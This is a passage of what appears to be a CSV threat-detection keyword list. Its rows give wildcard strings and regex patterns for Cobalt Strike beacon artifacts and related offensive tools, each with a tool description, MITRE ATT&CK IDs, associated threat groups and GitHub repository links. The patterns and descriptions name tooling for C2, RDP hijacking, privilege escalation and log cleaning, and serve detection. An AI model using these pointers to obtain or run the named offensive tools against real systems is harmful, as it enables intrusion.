BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35666"
"*beacon_funcs.x64.*",".{0,1000}beacon_funcs\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35667"
"*beacon_funcs.x86.*",".{0,1000}beacon_funcs\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35668"
"*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","35669"
"*beacon_generate.py*",".{0,1000}beacon_generate\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","35670"
"*Beacon_GETPOST*",".{0,1000}Beacon_GETPOST.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35671"
"*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35672"
"*beacon_host_script*",".{0,1000}beacon_host_script.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","35673"
"*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35674"
"*beacon_inline_execute*",".{0,1000}beacon_inline_execute.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","35675"
"*beacon_keys -compile geacon_sourcecode_folder*",".{0,1000}beacon_keys\s\-compile\sgeacon_sourcecode_folder.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35676"
"*beacon_log_clean*",".{0,1000}beacon_log_clean.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","35677"
"*beacon_output_ps.cna*",".{0,1000}beacon_output_ps\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","35678"
"*beacon_print*",".{0,1000}beacon_print.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","35679"
"*BEACON_RDLL_*",".{0,1000}BEACON_RDLL_.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35680"
"*beacon_remote_exec_*",".{0,1000}beacon_remote_exec_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35681"
"*beacon_remote_exec_method_describe*",".{0,1000}beacon_remote_exec_method_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35682"
"*beacon_remote_exec_method_register*",".{0,1000}beacon_remote_exec_method_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 